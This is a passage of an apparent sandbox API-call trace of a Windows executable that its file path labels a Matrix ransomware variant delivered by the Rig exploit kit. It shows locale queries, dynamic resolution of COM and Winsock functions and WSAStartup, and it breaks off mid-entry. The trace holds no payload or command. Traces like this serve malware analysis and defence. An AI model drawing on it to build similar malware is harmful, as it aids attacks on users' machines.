lpLCData=0x12fb00, cchData=2 | out: lpLCData="/") returned 2 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0090.875] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0090.875] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fb00, cchData=2 | out: lpLCData=":") returned 2 [0090.875] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f908, cchData=256 | out: lpLCData="AM") returned 3 [0090.875] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f908, cchData=256 | out: lpLCData="PM") returned 3 [0090.875] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0090.875] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0090.875] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0090.875] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0090.875] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x76c10000 [0090.875] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeTypeEx") returned 0x76c14c28 [0090.875] GetProcAddress (hModule=0x76c10000, lpProcName="VarNeg") returned 0x76c8c802 [0090.875] GetProcAddress (hModule=0x76c10000, lpProcName="VarNot") returned 0x76c8ec66 [0090.875] GetProcAddress (hModule=0x76c10000, lpProcName="VarAdd") returned 0x76c35934 [0090.875] GetProcAddress (hModule=0x76c10000, lpProcName="VarSub") returned 0x76c8d332 [0090.875] GetProcAddress (hModule=0x76c10000, 
lpProcName="VarMul") returned 0x76c8dbd4 [0090.875] GetProcAddress (hModule=0x76c10000, lpProcName="VarDiv") returned 0x76c8e405 [0090.875] GetProcAddress (hModule=0x76c10000, lpProcName="VarIdiv") returned 0x76c8f00a [0090.875] GetProcAddress (hModule=0x76c10000, lpProcName="VarMod") returned 0x76c8f15e [0090.875] GetProcAddress (hModule=0x76c10000, lpProcName="VarAnd") returned 0x76c35a98 [0090.875] GetProcAddress (hModule=0x76c10000, lpProcName="VarOr") returned 0x76c8ecfa [0090.875] GetProcAddress (hModule=0x76c10000, lpProcName="VarXor") returned 0x76c8ee2e [0090.875] GetProcAddress (hModule=0x76c10000, lpProcName="VarCmp") returned 0x76c2b0dc [0090.875] GetProcAddress (hModule=0x76c10000, lpProcName="VarI4FromStr") returned 0x76c26fab [0090.875] GetProcAddress (hModule=0x76c10000, lpProcName="VarR4FromStr") returned 0x76c301a0 [0090.876] GetProcAddress (hModule=0x76c10000, lpProcName="VarR8FromStr") returned 0x76c2699e [0090.876] GetProcAddress (hModule=0x76c10000, lpProcName="VarDateFromStr") returned 0x76c36ba7 [0090.876] GetProcAddress (hModule=0x76c10000, lpProcName="VarCyFromStr") returned 0x76c56c12 [0090.876] GetProcAddress (hModule=0x76c10000, lpProcName="VarBoolFromStr") returned 0x76c2dbd1 [0090.876] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromCy") returned 0x76c37fdc [0090.876] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromDate") returned 0x76c27a2a [0090.876] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromBool") returned 0x76c30355 [0090.876] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x84 [0090.876] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x88 [0090.876] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8c [0090.876] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=14766522963) returned 1 [0090.876] GetTickCount () returned 
0x225e7 [0090.876] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x7, wMilliseconds=0xe2)) [0090.876] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x7, wMilliseconds=0xe2)) [0090.876] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=14766537886) returned 1 [0090.876] GetTickCount () returned 0x225e7 [0090.876] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x7, wMilliseconds=0xe2)) [0090.876] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x7, wMilliseconds=0xe2)) [0090.876] GetModuleHandleW (lpModuleName="ole32.dll") returned 0x76750000 [0090.876] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0090.876] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x13f82bc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoCreateInstanceEx", lpUsedDefaultChar=0x0) returned 18 [0090.876] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstanceEx") returned 0x76799d4e [0090.876] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0090.876] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 
lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x13e288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitializeEx", lpUsedDefaultChar=0x0) returned 14 [0090.876] GetProcAddress (hModule=0x76750000, lpProcName="CoInitializeEx") returned 0x767909ad [0090.876] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0090.877] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x13f82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoAddRefServerProcess", lpUsedDefaultChar=0x0) returned 21 [0090.877] GetProcAddress (hModule=0x76750000, lpProcName="CoAddRefServerProcess") returned 0x767b3cf3 [0090.877] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0090.877] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x13f82bc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoReleaseServerProcess", lpUsedDefaultChar=0x0) returned 22 [0090.877] GetProcAddress (hModule=0x76750000, lpProcName="CoReleaseServerProcess") returned 0x767b4314 [0090.877] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0090.877] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x13f82bc, 
cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoResumeClassObjects", lpUsedDefaultChar=0x0) returned 20 [0090.877] GetProcAddress (hModule=0x76750000, lpProcName="CoResumeClassObjects") returned 0x7675ea02 [0090.877] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0090.877] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x13f82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoSuspendClassObjects", lpUsedDefaultChar=0x0) returned 21 [0090.877] GetProcAddress (hModule=0x76750000, lpProcName="CoSuspendClassObjects") returned 0x767bbb02 [0090.877] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0090.877] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0090.877] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x13ff48c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0090.877] GetProcAddress (hModule=0x76910000, lpProcName="InitializeConditionVariable") returned 0x77289981 [0090.877] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0090.877] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", 
cchWideChar=21, lpMultiByteStr=0x13f82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", lpUsedDefaultChar=0x0) returned 21 [0090.877] GetProcAddress (hModule=0x76910000, lpProcName="WakeConditionVariable") returned 0x772d5a7b [0090.877] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0090.877] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x13ff48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0090.877] GetProcAddress (hModule=0x76910000, lpProcName="WakeAllConditionVariable") returned 0x772545a5 [0090.877] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0090.877] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x13ff48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0090.877] GetProcAddress (hModule=0x76910000, lpProcName="SleepConditionVariableCS") returned 0x769418be [0090.877] GetThreadLocale () returned 0x409 [0090.877] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0090.877] GetCurrentThreadId () returned 0xa8c [0090.877] GetCurrentThreadId () returned 0xa8c [0090.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="2") returned 2 [0090.877] GetThreadLocale () returned 0x409 [0090.878] 
EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0090.878] GetThreadLocale () returned 0x409 [0090.878] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0090.878] GetCurrentThreadId () returned 0xa8c [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sun") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sunday") returned 7 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Mon") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Monday") returned 7 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tue") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tuesday") returned 8 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wed") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wednesday") returned 10 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thu") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thursday") returned 9 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Fri") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Friday") returned 7 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sat") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, 
lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Saturday") returned 9 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jan") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="January") returned 8 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Feb") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="February") returned 9 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Mar") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="March") returned 6 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Apr") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="April") returned 6 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jun") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="June") returned 5 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jul") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="July") returned 5 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Aug") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, 
lpLCData=0x12f7d0, cchData=256 | out: lpLCData="August") returned 7 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Sep") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="September") returned 10 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Oct") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="October") returned 8 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Nov") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="November") returned 9 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Dec") returned 4 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="December") returned 9 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f820, cchData=256 | out: lpLCData="$") returned 2 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fa18, cchData=2 | out: lpLCData=".") returned 2 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f820, cchData=256 | out: lpLCData="2") returned 2 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fa18, cchData=2 | out: lpLCData="/") returned 2 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f7d8, 
cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0090.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0090.879] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0090.879] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0090.879] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fa18, cchData=2 | out: lpLCData=":") returned 2 [0090.879] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f820, cchData=256 | out: lpLCData="AM") returned 3 [0090.879] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f820, cchData=256 | out: lpLCData="PM") returned 3 [0090.879] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0090.879] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0090.879] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0090.879] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0090.879] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x77380000 [0091.634] GetProcAddress (hModule=0x77380000, lpProcName="WSAIoctl") returned 0x77382fe7 [0091.634] GetProcAddress (hModule=0x77380000, lpProcName="__WSAFDIsSet") returned 0x77386a8a [0091.634] GetProcAddress (hModule=0x77380000, lpProcName="closesocket") returned 0x77383918 [0091.634] GetProcAddress (hModule=0x77380000, lpProcName="ioctlsocket") returned 0x77383084 [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="WSAGetLastError") returned 0x773837ad [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="WSAStartup") returned 0x77383ab2 [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="WSACleanup") returned 
0x77383c5f [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="accept") returned 0x773868b6 [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="bind") returned 0x77384582 [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="connect") returned 0x77386bdd [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="getpeername") returned 0x77387147 [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="getsockname") returned 0x773830af [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="getsockopt") returned 0x7738737d [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="htonl") returned 0x77382d57 [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="htons") returned 0x77382d8b [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="inet_addr") returned 0x7738311b [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="inet_ntoa") returned 0x7738b131 [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="listen") returned 0x7738b001 [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="ntohl") returned 0x77382d57 [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="ntohs") returned 0x77382d8b [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="recv") returned 0x77386b0e [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="recvfrom") returned 0x7738b6dc [0091.635] GetProcAddress (hModule=0x77380000, lpProcName="select") returned 0x77386989 [0091.636] GetProcAddress (hModule=0x77380000, lpProcName="send") returned 0x77386f01 [0091.636] GetProcAddress (hModule=0x77380000, lpProcName="sendto") returned 0x773834b5 [0091.636] GetProcAddress (hModule=0x77380000, lpProcName="setsockopt") returned 0x773841b6 [0091.636] GetProcAddress (hModule=0x77380000, lpProcName="shutdown") returned 0x7738449d [0091.636] GetProcAddress (hModule=0x77380000, lpProcName="socket") returned 0x77383eb8 [0091.636] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyaddr") returned 0x77396c01 [0091.636] GetProcAddress 
(hModule=0x77380000, lpProcName="gethostbyname") returned 0x77397673 [0091.636] GetProcAddress (hModule=0x77380000, lpProcName="getprotobyname") returned 0x773968b3 [0091.636] GetProcAddress (hModule=0x77380000, lpProcName="getprotobynumber") returned 0x773967c4 [0091.636] GetProcAddress (hModule=0x77380000, lpProcName="getservbyname") returned 0x77396ef3 [0091.636] GetProcAddress (hModule=0x77380000, lpProcName="getservbyport") returned 0x77396d62 [0091.636] GetProcAddress (hModule=0x77380000, lpProcName="gethostname") returned 0x7738a05b [0091.636] GetProcAddress (hModule=0x77380000, lpProcName="getaddrinfo") returned 0x77384296 [0091.636] GetProcAddress (hModule=0x77380000, lpProcName="freeaddrinfo") returned 0x77384b1b [0091.636] GetProcAddress (hModule=0x77380000, lpProcName="getnameinfo") returned 0x773867b7 [0091.636] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x4e9ec0 | out: lpWSAData=0x4e9ec0) returned 0 [0092.065] GetACP () returned 0x4e4 [0092.065] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fc28 | out: lpCPInfo=0x12fc28) returned 1 [0092.065] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa5c, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe" (normalized: "c:\\users\\eebsym5\\desktop\\2017-04-03-eitest-rig-ek-payload-matrix-ransomware-variant.exe")) returned 0x57 [0092.065] GetTickCount () returned 0x22635 [0092.065] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc38 | out: lpPerformanceCount=0x12fc38*=14885424557) returned 1 [0092.065] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x37\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0092.065] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: 
lpWideCharStr="\x6c\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0092.065] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x36\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0092.065] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4f\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0092.065] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x57\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0092.065] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x44\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0092.065] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x49\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0092.065] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x39\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0092.065] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x46\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0092.065] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6d\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0092.066] MultiByteToWideChar (in: 
